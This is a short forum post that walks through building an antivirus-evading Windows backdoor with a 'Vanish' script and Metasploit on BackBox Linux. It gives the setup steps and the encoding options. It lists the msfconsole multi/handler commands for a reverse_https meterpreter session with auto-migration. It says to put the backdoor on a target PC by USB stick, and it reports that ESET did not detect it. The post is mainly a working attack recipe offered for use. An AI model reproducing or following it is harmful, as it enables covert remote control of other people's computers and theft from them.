Metasploit & Vanish Script For BackBox

[ltdan]

Metasploit & Vanish Script For BackBox

The video http://www.youtube.com/watch?v=uXYkesXr8uA demonstrates how to bypass AV on XP Pro.

I tested the Vanish script on Win 7x64 with eset and an interactive firewall.  The firewall in interactive mode shows the request for the call out but does not show the backdoor as a trojan when the AV is turned on.  If anyone has anything to help improve this such as better exploits etc. please post a link.

The Vanish script was made for BT.  The way i got it to work on BackBox 3 was to first open synaptic, install binutils-mingw-w64-i686
after that's installed synaptic install gcc-mingw32, after that then gcc-mingw-w64.  

1.Place the Vanish script into /opt/backbox/msf.
Here's the script: http://pastebin.com/7xmvGnks

2.Go to line 43 in the script change reverse_tcp to reverse_https

3.Then to line 91 uncomment.
Rename to Vanish.sh run the script from msf directory ./Vanish.sh
4.It'll ask for you net connection, choose eth0 or wlan0 etc.
port is 8443, random seed number, i simply picked 8001
encode 10 times

5.After it's done from msf folder go into seclabs folder, copy the backdoor.exe onto your stick place on target pc.

A meterpreter file that is needed is located at: https://sites.google.com/a/invisibledenizen.org/upload/asdf/launch_and_migrate.rb?attredirects=0.

6.Place that in /opt/backbox/msf/scripts/meterpreter

7.Open msfconsole and run commands

Use exploits/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
show options
set LHOST 192.168.1.xxx
set LPORT 8443
show advanced options
set AutoRunScript launch_and_migrate.rb
exploit
lt

Found this script, very pretty much the same but automates better, placed in in Meta folder. After doing the same above so it has the dependencies installed, it eset did not detect it however, the cmd window has to stay open for meterpreter to stay connected i chose option 2, reverse_https, copied the text, didn't download to gedit, renamed file Undetek.sh http://pastebin.com/w6hYF7Hp